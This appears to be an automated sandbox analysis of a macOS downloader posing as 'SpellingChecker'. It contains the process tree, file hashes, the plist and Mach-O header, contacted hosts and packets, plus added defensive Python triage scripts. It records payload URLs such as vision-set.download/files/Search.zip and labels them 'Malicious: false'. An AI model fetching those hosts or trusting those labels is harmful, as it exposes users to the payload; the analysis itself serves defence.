      • unzip (PID: 718 PPID: 717 Overlayed Process Image: sh MD5: f598378ec162f3480d71dc44cc07243c)
    • xattr (PID: 719 PPID: 710 MD5: e2ca6555fe4b8c6a97d1ced2156c9b69)
    • Python (PID: 719 PPID: 710 Overlayed Process Image: xattr MD5: ba780ab677147d9db60c564ef3f51dd0)
    • xattr (PID: 720 PPID: 710 MD5: e2ca6555fe4b8c6a97d1ced2156c9b69)
    • Python (PID: 720 PPID: 710 Overlayed Process Image: xattr MD5: ba780ab677147d9db60c564ef3f51dd0)
    • open (PID: 721 PPID: 710 MD5: 40ed6d8f35c9f20484b97582d296398f)
  • xpcproxy (PID: 722 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • Search (PID: 722 PPID: 1 Overlayed Process Image: xpcproxy MD5: 964bacf4c598811008b7b6379945eb8a)
    • sh (PID: 723 PPID: 722 MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 724 PPID: 723 MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 724 PPID: 723 Overlayed Process Image: sh MD5: 8aa60b22a5d30418a002b340989384dc)
        • sh (PID: 725 PPID: 724 MD5: 8aa60b22a5d30418a002b340989384dc)
        • defaults (PID: 725 PPID: 724 Overlayed Process Image: sh MD5: 831678c94c2d9c647bf3d283b1861bda)
  • cleanup

Created / dropped Files

/dev/null
Process:/private/tmp/Search.app/Contents/MacOS/Search
File Type:ASCII text
Size (bytes):181
Entropy (8bit):5.116840263214813
Encrypted:false
MD5:E67BFD571368561F246E4AB021FB48D0
SHA1:2CDC676735E83E04FA6C80DE4B971136AAFEE52E
SHA-256:706CDDB4EDD286C429728A63A6C25455571BD49376BBAD64D19102014B3FCEDA
SHA-512:769026A74344BD45BD06397247C6AD5FD00C30A06D2C1368601DCA8A71232AB6D91CDDE9C60880D6DD647C775FE21634015E78A829F008A6342EF356B4CA5DC8
Malicious:false
Reputation:low
/private/tmp/.dat.nosync02c6.3NY2ts
Process:/Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker
File Type:Zip archive data, at least v1.0 to extract
Size (bytes):53113
Entropy (8bit):7.982567069854612
Encrypted:false
MD5:571DC46877EE9B1EE1A169B479018897
SHA1:2C2ECFB454A555432F4E126C9048836ED3EA0CF0
SHA-256:641773F7DBF383798BD4A1E2CA9E4949A975CE71F8BCCDE023B3921CF6158231
SHA-512:AF29F31CE1AC8900BC6D34803FBF4B2BDD726864EE3E91606CD53972137DABDC47E9E7283FD17D333FB6808F6162F2703037006800C9570BCAAFDBA75403C1C4
Malicious:false
Reputation:low
/private/tmp/Search.app/Contents/Info.plist
Process:/usr/bin/unzip
File Type:XML document text
Size (bytes):1545
Entropy (8bit):5.159619643004488
Encrypted:false
MD5:EFAFFBB1150117157339CD7ED4B690BF
SHA1:12781F8207EF88D2648AF32462D6CAD6E07CFEEE
SHA-256:F9565F92C0FDC883F2B9B1011F18CA7BC4ACC0DF8F380DA49749A604C7BD9714
SHA-512:7D55F375B2E0DFD88A251C8181B41A2B77F10BAD311282EFEE272D6CC5FE2E3B3C1FE9AB7DAA4E7B1ECA72D05FEDCF5B58CCD435730E668583932ED35F015290
Malicious:false
Reputation:low
/private/tmp/Search.app/Contents/MacOS/Search
Process:/usr/bin/unzip
File Type:Mach-O 64-bit executable
Size (bytes):70384
Entropy (8bit):5.2940628185687935
Encrypted:false
MD5:964BACF4C598811008B7B6379945EB8A
SHA1:158F6997464FAC2D28D5E096B00A893B8EF75E37
SHA-256:43FF15F25E382016BCCE277D3DBC3C9726EE8DFDC590593E381C795BCFEBABD4
SHA-512:F44D722A67F83B78E1F8EB74B2F37CDA3B80929BB74B27F769900ADD49BE50795C7FFBB09FF6C8344B5CFEF98B2E2DCF23A58394B029D869AF854D8ABA4BCBF1
Malicious:false
Reputation:low
/private/tmp/Search.app/Contents/PkgInfo
Process:/usr/bin/unzip
File Type:ASCII text, with no line terminators
Size (bytes):8
Entropy (8bit):1.75
Encrypted:false
MD5:23B7D7D024ABB0F558420E098800BF27
SHA1:9F9EEA0CFE2D65F2C3D6B092E375B40782D08F31
SHA-256:82502191C9484B04D685374F9879A0066069C49B8ACAE7A04B01D38D07E8ECA0
SHA-512:F77D501528DD0CED155C80406CFBEE38D5D3649B64D2A9324F3D6CEE39491EB8F54CDEBAE49C6E21A20D2309D8FAE1B01C41631224811E73483DB25A2695738C
Malicious:false
Reputation:low
/private/tmp/Search.app/Contents/Resources/Base.lproj/MainMenu.nib
Process:/usr/bin/unzip
File Type:Apple binary property list
Size (bytes):43264
Entropy (8bit):7.045244400186084
Encrypted:false
MD5:0AEAC8F960CB18C95837C527B5ADF442
SHA1:36F94D29CB8B9BE5A3628EF83B2B8EDB9D25F723
SHA-256:7056CF58EC39D1C0F4B5D011C273490F72C88AF940F19F0EF3665D60BE0D92DA
SHA-512:28A9B19F29D05604FE3F586DFF116CA42BA230BAE27DA022522774EBB71F500543F25BE6A609AC0D699A3A265EC8EEBA5C4CCBB250DAF5D51A9FC002C312062A
Malicious:false
Reputation:low
/private/tmp/Search.app/Contents/_CodeSignature/CodeResources
Process:/usr/bin/unzip
File Type:XML document text
Size (bytes):2468
Entropy (8bit):4.905198116363016
Encrypted:false
MD5:6FF270AB1711BE733D4183A3A37C2008
SHA1:8621991927CB675E5B99A9DAF79074E03E1C4948
SHA-256:CD8F2C2B948010489BD50E6294A3B6D73B01CDB106499D103EA6CEEA82274179
SHA-512:A94B8859EF4661366BC588E2982007FCC961140BBBF4E53F1F9120CA6E3EEDFDB842E1424B092A4631FCC70DA44ADBCB4F0616C630B765339948A21DDDE4FEEE
Malicious:false
Reputation:low

Domains and IPs

Contacted Domains

Name                  IP               Active   Malicious   Antivirus Detection   Reputation
vision-set.download   195.154.31.197   true     false                             unknown
rs64nrl.info          163.172.60.125   true     false                             unknown

Contacted URLs

Name                                              Malicious   Antivirus Detection   Reputation
http://vision-set.download/api/event/log.php      false                             unknown
http://vision-set.download/files/cmdse.txt        false                             unknown
http://rs64nrl.info/readautoip.php?prefix=upd:    false                             unknown
http://vision-set.download/hello.txt              false                             unknown
http://vision-set.download/api/event/ping.php     false                             unknown
http://vision-set.download/files/Search.zip       false                             unknown

Contacted IPs

Public

IP               Country          ASN     ASN Name    Malicious
195.154.31.197   France           12876   AS12876FR   false
163.172.60.125   United Kingdom   12876   AS12876FR   false

Static File Info

General

File type: Zip archive data, at least v1.0 to extract
Entropy (8bit): 7.991438112092073
TrID:
  • Mac OS X Application Bundle (12004/1) 74.95%
  • ZIP compressed archive (4004/1) 25.00%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name: iWk7svKGhJ.app
File size: 88882
MD5: 784a95029a730ccbbf1efac72d7264d6
SHA1: f63a8de8645bb9ea1f053711be0808fd639179bd
SHA256: 4eaa4caea4ac543516ffc9954a901e8b8e8c623fcce48304ea74d7a74218683b
SHA512: 93ee9acf67fdbdaadc1e14ba4d801660c2065bbf139b6328f84a6d2f6684aa9912a9ee0881ba1d724b88966057fc5817fab8d324dc5168b61b3626ec484fbe52
File Content Preview: PK........L.[L................SpellingChecker.app/UX.....[...Z.>..PK........L.[L................SpellingChecker.app/Contents/UX.....[...Z.>..PK........L.[L............,...SpellingChecker.app/Contents/_CodeSignature/UX.....[...Z.>..PK........V.[L..........

Static App Info

General Information

Package Info:
Property List File:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>BuildMachineOSBuild</key><string>17E160e</string>
    <key>CFBundleDevelopmentRegion</key><string>en</string>
    <key>CFBundleExecutable</key><string>SpellingChecker</string>
    <key>CFBundleIdentifier</key><string>com.spelling.checker.Agent</string>
    <key>CFBundleInfoDictionaryVersion</key><string>6.0</string>
    <key>CFBundleName</key><string>SpellingChecker</string>
    <key>CFBundlePackageType</key><string>APPL</string>
    <key>CFBundleShortVersionString</key><string>1.22</string>
    <key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array>
    <key>CFBundleVersion</key><string>22</string>
    <key>DTCompiler</key><string>com.apple.compilers.llvm.clang.1_0</string>
    <key>DTPlatformBuild</key><string>9C40b</string>
    <key>DTPlatformVersion</key><string>GM</string>
    <key>DTSDKBuild</key><string>17C76</string>
    <key>DTSDKName</key><string>macosx10.13</string>
    <key>DTXcode</key><string>0920</string>
    <key>DTXcodeBuild</key><string>9C40b</string>
    <key>LSApplicationCategoryType</key><string></string>
    <key>LSMinimumSystemVersion</key><string>10.10</string>
    <key>LSUIElement</key><true/>
    <key>NSAppTransportSecurity</key><dict><key>NSAllowsArbitraryLoads</key><true/></dict>
    <key>NSHumanReadableCopyright</key><string>Copyright 2018 SpellingChecker. All rights reserved.</string>
    <key>NSMainNibFile</key><string>MainMenu</string>
    <key>NSPrincipalClass</key><string>NSApplication</string>
</dict>
</plist>
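Two keys in this Info.plist matter for triage: NSAppTransportSecurity/NSAllowsArbitraryLoads is true, which lets the app speak plain HTTP to any host (all of the traffic in this report is HTTP), and LSUIElement is true, so the app runs without a Dock icon or menu bar. The User-Agent in the captured requests, SpellingChecker/22, is CFBundleName/CFBundleVersion from this plist. The following Python is an added example, not code from the report or the sample: it parses the plist as printed above with the standard-library plistlib, flags those settings, and derives the User-Agent prefix so the captured traffic can be tied back to the bundle. The check names are this example's own.

```python
"""Static triage of a macOS Info.plist and correlation with captured traffic.

Added example; not code from the report or the sample. INFO_PLIST is the
SpellingChecker.app Info.plist from the report's Static App Info section;
CAPTURED_UA is the User-Agent from the report's HTTP requests. Check names
are this example's own.
"""
import plistlib
from typing import Dict, List

INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>BuildMachineOSBuild</key><string>17E160e</string>
  <key>CFBundleDevelopmentRegion</key><string>en</string>
  <key>CFBundleExecutable</key><string>SpellingChecker</string>
  <key>CFBundleIdentifier</key><string>com.spelling.checker.Agent</string>
  <key>CFBundleInfoDictionaryVersion</key><string>6.0</string>
  <key>CFBundleName</key><string>SpellingChecker</string>
  <key>CFBundlePackageType</key><string>APPL</string>
  <key>CFBundleShortVersionString</key><string>1.22</string>
  <key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array>
  <key>CFBundleVersion</key><string>22</string>
  <key>DTCompiler</key><string>com.apple.compilers.llvm.clang.1_0</string>
  <key>DTPlatformBuild</key><string>9C40b</string>
  <key>DTPlatformVersion</key><string>GM</string>
  <key>DTSDKBuild</key><string>17C76</string>
  <key>DTSDKName</key><string>macosx10.13</string>
  <key>DTXcode</key><string>0920</string>
  <key>DTXcodeBuild</key><string>9C40b</string>
  <key>LSApplicationCategoryType</key><string></string>
  <key>LSMinimumSystemVersion</key><string>10.10</string>
  <key>LSUIElement</key><true/>
  <key>NSAppTransportSecurity</key><dict><key>NSAllowsArbitraryLoads</key><true/></dict>
  <key>NSHumanReadableCopyright</key><string>Copyright 2018 SpellingChecker. All rights reserved.</string>
  <key>NSMainNibFile</key><string>MainMenu</string>
  <key>NSPrincipalClass</key><string>NSApplication</string>
</dict>
</plist>
"""

CAPTURED_UA = "SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)"


def triage(plist_bytes: bytes) -> Dict[str, object]:
    """Parse an Info.plist and flag the settings worth a second look."""
    info = plistlib.loads(plist_bytes)
    flags: List[str] = []
    ats = info.get("NSAppTransportSecurity") or {}
    if ats.get("NSAllowsArbitraryLoads"):
        flags.append("ats-disabled")        # plain HTTP (and weak TLS) permitted to every host
    if info.get("LSUIElement"):
        flags.append("no-dock-icon")        # background agent: no Dock tile, no menu bar
    if not info.get("LSApplicationCategoryType"):
        flags.append("no-app-category")     # required for App Store submissions; empty here
    return {
        "bundle_id": info.get("CFBundleIdentifier"),
        "executable": info.get("CFBundleExecutable"),
        "min_os": info.get("LSMinimumSystemVersion"),
        # CFNetwork's default User-Agent begins with <CFBundleName>/<CFBundleVersion>
        "user_agent_prefix": f"{info.get('CFBundleName')}/{info.get('CFBundleVersion')}",
        "flags": flags,
    }


def user_agent_matches(plist_bytes: bytes, user_agent: str) -> bool:
    """True when a captured CFNetwork User-Agent was produced by this bundle."""
    prefix = triage(plist_bytes)["user_agent_prefix"]
    return user_agent.startswith(f"{prefix} ")


if __name__ == "__main__":
    result = triage(INFO_PLIST)
    for key, value in result.items():
        print(f"{key:>18}: {value}")
    print("captured UA from this bundle:", user_agent_matches(INFO_PLIST, CAPTURED_UA))
```

On this plist the three flags fire together and the captured User-Agent matches; a User-Agent such as "Search/1 CFNetwork/..." from the second-stage bundle would not.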

Resources

Name              Type
Info.plist        XML document text
PkgInfo           ASCII text, with no line terminators
SpellingChecker   Mach-O 64-bit executable
MainMenu.nib      Apple binary property list
CodeResources     XML document text

Static Mach Info

General information for header 0

Endian: < (little-endian)
Size: 64-bit
Architecture: x86_64
Filetype: execute
Nbr. of load commands: 23
segment_command_64
  segname: __PAGEZERO
  fileoff: 0
  maxprot: 0
  vmsize: 4294967296
  nsects: 0
  flags: 0
  filesize: 0
  vmaddr: 0
  initprot: 0
segment_command_64
  segname: __TEXT
  fileoff: 0
  maxprot: 7
  vmsize: 110592
  nsects: 10
  flags: 0
  filesize: 110592
  vmaddr: 4294967296
  initprot: 5
  sections (segname __TEXT for all):
    sectname | addr | offset | size | align | flags | reserved1 | reserved2 | reserved3 | reloff | nreloc
    __text | 4294973108 | 5812 | 85048 | 0 | 2147484672 | 0 | 0 | 0 | 0 | 0
    __stubs | 4295058156 | 90860 | 564 | 1 | 2147484680 | 0 | 6 | 0 | 0 | 0
    __stub_helper | 4295058720 | 91424 | 956 | 2 | 2147484672 | 0 | 0 | 0 | 0 | 0
    __cstring | 4295059676 | 92380 | 5889 | 0 | 2 | 0 | 0 | 0 | 0 | 0
    __objc_methname | 4295065565 | 98269 | 5036 | 0 | 2 | 0 | 0 | 0 | 0 | 0
    __objc_classname | 4295070601 | 103305 | 163 | 0 | 2 | 0 | 0 | 0 | 0 | 0
    __objc_methtype | 4295070764 | 103468 | 1380 | 0 | 2 | 0 | 0 | 0 | 0 | 0
    __gcc_except_tab | 4295072144 | 104848 | 5312 | 2 | 0 | 0 | 0 | 0 | 0 | 0
    __const | 4295077456 | 110160 | 24 | 4 | 0 | 0 | 0 | 0 | 0 | 0
    __unwind_info | 4295077480 | 110184 | 408 | 2 | 0 | 0 | 0 | 0 | 0 | 0
segment_command_64
  segname: __DATA
  fileoff: 110592
  maxprot: 7
  vmsize: 20480
  nsects: 18
  flags: 0
  filesize: 20480
  vmaddr: 4295077888
  initprot: 3
  sections (segname __DATA for all):
    sectname | addr | offset | size | align | flags | reserved1 | reserved2 | reserved3 | reloff | nreloc
    __nl_symbol_ptr | 4295077888 | 110592 | 16 | 3 | 6 | 94 | 0 | 0 | 0 | 0
    __got | 4295077904 | 110608 | 240 | 3 | 6 | 96 | 0 | 0 | 0 | 0
    __la_symbol_ptr | 4295078144 | 110848 | 752 | 3 | 7 | 126 | 0 | 0 | 0 | 0
    __const | 4295078896 | 111600 | 96 | 3 | 0 | 0 | 0 | 0 | 0 | 0
    __cfstring | 4295078992 | 111696 | 6848 | 3 | 0 | 0 | 0 | 0 | 0 | 0
    __objc_classlist | 4295085840 | 118544 | 56 | 3 | 268435456 | 0 | 0 | 0 | 0 | 0
    __objc_nlclslist | 4295085896 | 118600 | 8 | 3 | 268435456 | 0 | 0 | 0 | 0 | 0
    __objc_catlist | 4295085904 | 118608 | 8 | 3 | 268435456 | 0 | 0 | 0 | 0 | 0
    __objc_protolist | 4295085912 | 118616 | 32 | 3 | 0 | 0 | 0 | 0 | 0 | 0
    __objc_imageinfo | 4295085944 | 118648 | 8 | 2 | 0 | 0 | 0 | 0 | 0 | 0
    __objc_const | 4295085952 | 118656 | 5592 | 3 | 0 | 0 | 0 | 0 | 0 | 0
    __objc_selrefs | 4295091544 | 124248 | 1504 | 3 | 268435461 | 0 | 0 | 0 | 0 | 0
    __objc_protorefs | 4295093048 | 125752 | 16 | 3 | 0 | 0 | 0 | 0 | 0 | 0
    __objc_classrefs | 4295093064 | 125768 | 232 | 3 | 268435456 | 0 | 0 | 0 | 0 | 0
    __objc_ivar | 4295093296 | 126000 | 8 | 3 | 0 | 0 | 0 | 0 | 0 | 0
    __objc_data | 4295093304 | 126008 | 640 | 3 | 0 | 0 | 0 | 0 | 0 | 0
    __data | 4295093944 | 126648 | 480 | 3 | 0 | 0 | 0 | 0 | 0 | 0
    __bss | 4295094432 | 0 | 768 | 4 | 1 | 0 | 0 | 0 | 0 | 0
segment_command_64
  segname: __LINKEDIT
  fileoff: 131072
  maxprot: 7
  vmsize: 24576
  nsects: 0
  flags: 0
  filesize: 23152
  vmaddr: 4295098368
  initprot: 1
dyld_info_command
  rebase_off: 131072
  rebase_size: 296
  bind_off: 131368
  bind_size: 1808
  weak_bind_off: 0
  weak_bind_size: 0
  lazy_bind_off: 133176
  lazy_bind_size: 2496
  export_off: 135672
  export_size: 32
symtab_command
  symoff: 135928
  nsyms: 150
  stroff: 139208
  strsize: 3200
dysymtab_command
  ilocalsym: 0
  nlocalsym: 1
  iextdefsym: 1
  nextdefsym: 1
  iundefsym: 2
  nundefsym: 148
  tocoff: 0
  ntoc: 0
  modtaboff: 0
  nmodtab: 0
  extrefsymoff: 0
  nextrefsyms: 0
  indirectsymoff: 138328
  nindirectsyms: 220
  extreloff: 0
  nextrel: 0
  locreloff: 0
  nlocrel: 0
dylinker_command
  name (string offset within the command): 12
  path: /usr/lib/dyld
uuid_command
  uuid: bf8a858cda863731950093ba2d5e4c5e (BF8A858C-DA86-3731-9500-93BA2D5E4C5E)
version_min_command
  version: 657920 (0x000A0A00 = 10.10.0, the minimum OS)
  sdk: 658688 (0x000A0D00 = 10.13.0; the tool labels this field "reserved", but in struct version_min_command it is the SDK version)
  Both values agree with LSMinimumSystemVersion 10.10 and DTSDKName macosx10.13 in the Info.plist.
source_version_command
  version: 0
entry_point_command
  entryoff: 10551 (file offset of main(); with __TEXT mapped at 4294967296 this is virtual address 0x100002937, inside __text)
  stacksize: 0
dylib_command (7 entries; in every one the name string offset is 24 and the timestamp field is epoch 2, which the tool renders in local time as Thu Jan 01 01:00:02 1970)
  path | current_version | compatibility_version
  /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation | 3840.170.5 | 0.44.1
  /usr/lib/libobjc.A.dylib | 0.228.0 | 0.1.0
  /usr/lib/libSystem.B.dylib | 0.228.4 | 0.1.0
  /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation | 3840.170.5 | 0.150.0
  /System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices | 4864.54.3 | 0.1.0
  /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit | 0.19.1 | 0.1.0
  /System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration | 7681.195.3 | 0.1.0
rpath_command
  path (string offset within the command): 12
  path: @executable_path/../Frameworks
linkedit_data_command (3 entries; the tool does not print the cmd type)
  dataoff | datasize
  135704 | 224
  135928 | 0
  142416 | 11808
  The first blob starts where the export trie ends (135672 + 32 = 135704), the second is empty and sits exactly at symoff (135928), and the third ends at 142416 + 11808 = 154224, which is __LINKEDIT fileoff + filesize. That is the layout ld64 emits for LC_FUNCTION_STARTS, LC_DATA_IN_CODE and LC_CODE_SIGNATURE in that order, so the last entry is the code signature blob that CodeResources and _CodeSignature belong to.
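Added example, not part of the Joe Sandbox report. The Static Mach Info table prints every field as a bare decimal, which hides what the values mean and whether they are consistent with each other. The block below decodes the ones worth reading, using numbers copied from the table: the version_min_command pair as X.Y.Z versions, section flags (type in the low byte, attribute bits above it), and the entry point as a virtual address. It then runs three consistency checks that packers and hand-edited binaries tend to break: every section's VA range and file range must lie inside its segment at the same displacement; the reserved1 field of the symbol-pointer sections and the reserved1/reserved2 pair of __stubs must index the indirect symbol table and end exactly at nindirectsyms (94 stubs of 6 bytes, then 2 + 30 + 94 pointers = 220); and the __LINKEDIT blobs must tile the segment, leaving only alignment padding. Constant names come from <mach-o/loader.h>; the section list is the subset the checks need; the two __LINKEDIT blobs whose command type the tool does not print are listed as linkedit_data[n]. The only gap the checks find in this binary is the 8 bytes between the end of the string table (142408) and the 16-byte-aligned code signature (142416).

```python
"""Decode and sanity-check the Mach-O load-command values printed above.

Added example, not part of the Joe Sandbox report. Numbers are copied from the
Static Mach Info table; the constants are from <mach-o/loader.h>."""

SECTION_TYPES = {0x0: "S_REGULAR", 0x1: "S_ZEROFILL", 0x2: "S_CSTRING_LITERALS",
                 0x5: "S_LITERAL_POINTERS", 0x6: "S_NON_LAZY_SYMBOL_POINTERS",
                 0x7: "S_LAZY_SYMBOL_POINTERS", 0x8: "S_SYMBOL_STUBS"}
SECTION_ATTRS = {0x80000000: "S_ATTR_PURE_INSTRUCTIONS",
                 0x10000000: "S_ATTR_NO_DEAD_STRIP",
                 0x00000400: "S_ATTR_SOME_INSTRUCTIONS"}

# segname -> (fileoff, filesize, vmaddr, vmsize) from the segment_command_64 entries
SEGMENTS = {"__TEXT": (0, 110592, 4294967296, 110592),
            "__DATA": (110592, 20480, 4295077888, 20480),
            "__LINKEDIT": (131072, 23152, 4295098368, 24576)}
# (sectname, segname, addr, offset, size, flags, reserved1, reserved2): the subset
# of the section table that the checks below need
SECTIONS = [("__text", "__TEXT", 4294973108, 5812, 85048, 2147484672, 0, 0),
            ("__stubs", "__TEXT", 4295058156, 90860, 564, 2147484680, 0, 6),
            ("__cstring", "__TEXT", 4295059676, 92380, 5889, 2, 0, 0),
            ("__nl_symbol_ptr", "__DATA", 4295077888, 110592, 16, 6, 94, 0),
            ("__got", "__DATA", 4295077904, 110608, 240, 6, 96, 0),
            ("__la_symbol_ptr", "__DATA", 4295078144, 110848, 752, 7, 126, 0),
            ("__objc_selrefs", "__DATA", 4295091544, 124248, 1504, 268435461, 0, 0),
            ("__bss", "__DATA", 4295094432, 0, 768, 1, 0, 0)]
ENTRYOFF = 10551        # entry_point_command.entryoff
NINDIRECTSYMS = 220     # dysymtab_command.nindirectsyms
# __LINKEDIT blobs as (name, offset, size); symtab and indirect-table sizes are
# nsyms * sizeof(struct nlist_64) and nindirectsyms * sizeof(uint32_t)
LINKEDIT_BLOBS = [("rebase", 131072, 296), ("bind", 131368, 1808),
                  ("lazy_bind", 133176, 2496), ("export", 135672, 32),
                  ("linkedit_data[0]", 135704, 224), ("linkedit_data[1]", 135928, 0),
                  ("symtab", 135928, 150 * 16), ("indirectsyms", 138328, 220 * 4),
                  ("strtab", 139208, 3200), ("linkedit_data[2]", 142416, 11808)]


def decode_version(packed):
    """version_min_command packs X.Y.Z as 0xXXXXYYZZ."""
    return f"{packed >> 16}.{(packed >> 8) & 0xFF}.{packed & 0xFF}"


def decode_section_flags(flags):
    """Low byte is the section type, the remaining bits are attributes."""
    stype = SECTION_TYPES.get(flags & 0xFF, f"type 0x{flags & 0xFF:02x}")
    return stype, [name for bit, name in SECTION_ATTRS.items() if flags & bit]


def entry_point_va(segments, entryoff):
    """LC_MAIN stores a file offset; the VA is __TEXT.vmaddr plus the offset into __TEXT."""
    fileoff, filesize, vmaddr, _ = segments["__TEXT"]
    if not fileoff <= entryoff < fileoff + filesize:
        raise ValueError("entryoff lies outside __TEXT")
    return vmaddr + (entryoff - fileoff)


def section_containing_offset(sections, fileoff):
    for name, _seg, _addr, off, size, flags, _r1, _r2 in sections:
        if flags & 0xFF != 0x1 and off <= fileoff < off + size:   # skip zerofill
            return name
    return None


def check_section_layout(segments, sections):
    """Each section must sit inside its segment in both VA and file space, at the
    same displacement in each; a mismatch means the segment is not a plain mapping."""
    problems = []
    for name, seg, addr, off, size, flags, _r1, _r2 in sections:
        fileoff, filesize, vmaddr, vmsize = segments[seg]
        if addr < vmaddr or addr + size > vmaddr + vmsize:
            problems.append(f"{name}: VA range outside {seg}")
        if flags & 0xFF == 0x1:          # zerofill sections occupy no file bytes
            continue
        if off < fileoff or off + size > fileoff + filesize:
            problems.append(f"{name}: file range outside {seg}")
        elif addr - vmaddr != off - fileoff:
            problems.append(f"{name}: VA/file displacement mismatch")
    return problems


def indirect_table_end(sections):
    """Symbol-pointer sections index the indirect symbol table via reserved1 (8 bytes
    per entry); __stubs does the same with reserved2 as the stub size. Returns the
    highest index used + 1, which should equal nindirectsyms."""
    end = 0
    for _name, _seg, _addr, _off, size, flags, r1, r2 in sections:
        stype = flags & 0xFF
        if stype in (0x6, 0x7):
            end = max(end, r1 + size // 8)
        elif stype == 0x8:
            end = max(end, r1 + size // r2)
    return end


def linkedit_gaps(segments, blobs):
    """Byte ranges of __LINKEDIT not covered by any known blob. A few bytes of
    alignment padding are normal; anything larger is worth dumping."""
    fileoff, filesize, _, _ = segments["__LINKEDIT"]
    gaps, pos = [], fileoff
    for _name, off, size in sorted(blobs, key=lambda b: b[1]):
        if off > pos:
            gaps.append((pos, off))
        pos = max(pos, off + size)
    if pos < fileoff + filesize:
        gaps.append((pos, fileoff + filesize))
    return gaps


if __name__ == "__main__":
    print("min OS", decode_version(657920), "SDK", decode_version(658688))
    print("entry VA 0x%x in" % entry_point_va(SEGMENTS, ENTRYOFF),
          section_containing_offset(SECTIONS, ENTRYOFF))
    for name, *_rest, flags, _r1, _r2 in SECTIONS:
        print(name, decode_section_flags(flags))
    print("layout problems:", check_section_layout(SEGMENTS, SECTIONS))
    print("indirect table end:", indirect_table_end(SECTIONS), "of", NINDIRECTSYMS)
    print("__LINKEDIT gaps:", linkedit_gaps(SEGMENTS, LINKEDIT_BLOBS))
```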

Network Behavior

Network Port Distribution

TCP Packets

The four rows on port 53 (58419 and 49265 to and from 8.8.8.8) are the DNS lookups that also appear under UDP Packets; the sandbox lists them in both tables.

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2018 14:12:20.368386984 CEST | 58419 | 53 | 192.168.0.50 | 8.8.8.8
Oct 3, 2018 14:12:20.405252934 CEST | 53 | 58419 | 8.8.8.8 | 192.168.0.50
Oct 3, 2018 14:12:20.407042027 CEST | 49235 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:20.432302952 CEST | 80 | 49235 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:20.432744026 CEST | 49235 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:20.435791969 CEST | 49235 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:20.461236000 CEST | 80 | 49235 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:20.461371899 CEST | 80 | 49235 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:20.461550951 CEST | 49235 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:20.464737892 CEST | 49236 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:20.487715006 CEST | 80 | 49236 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:20.487932920 CEST | 49236 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:20.488446951 CEST | 49236 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:20.511671066 CEST | 80 | 49236 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:20.511811018 CEST | 80 | 49236 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:20.512022972 CEST | 49236 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:20.528991938 CEST | 49265 | 53 | 192.168.0.50 | 8.8.8.8
Oct 3, 2018 14:12:20.560709000 CEST | 53 | 49265 | 8.8.8.8 | 192.168.0.50
Oct 3, 2018 14:12:20.561582088 CEST | 49237 | 80 | 192.168.0.50 | 163.172.60.125
Oct 3, 2018 14:12:20.584357023 CEST | 80 | 49237 | 163.172.60.125 | 192.168.0.50
Oct 3, 2018 14:12:20.584553003 CEST | 49237 | 80 | 192.168.0.50 | 163.172.60.125
Oct 3, 2018 14:12:20.585050106 CEST | 49237 | 80 | 192.168.0.50 | 163.172.60.125
Oct 3, 2018 14:12:20.607774973 CEST | 80 | 49237 | 163.172.60.125 | 192.168.0.50
Oct 3, 2018 14:12:20.608927965 CEST | 80 | 49237 | 163.172.60.125 | 192.168.0.50
Oct 3, 2018 14:12:20.609133959 CEST | 49237 | 80 | 192.168.0.50 | 163.172.60.125
Oct 3, 2018 14:12:21.006465912 CEST | 49238 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.032002926 CEST | 80 | 49238 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.032253981 CEST | 49238 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.032751083 CEST | 49238 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.033561945 CEST | 49238 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.057768106 CEST | 80 | 49238 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.058928013 CEST | 80 | 49238 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.064258099 CEST | 80 | 49238 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.064476967 CEST | 49238 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.068537951 CEST | 49239 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.094711065 CEST | 80 | 49239 | 195.154.31.197 | 192.168.0.50
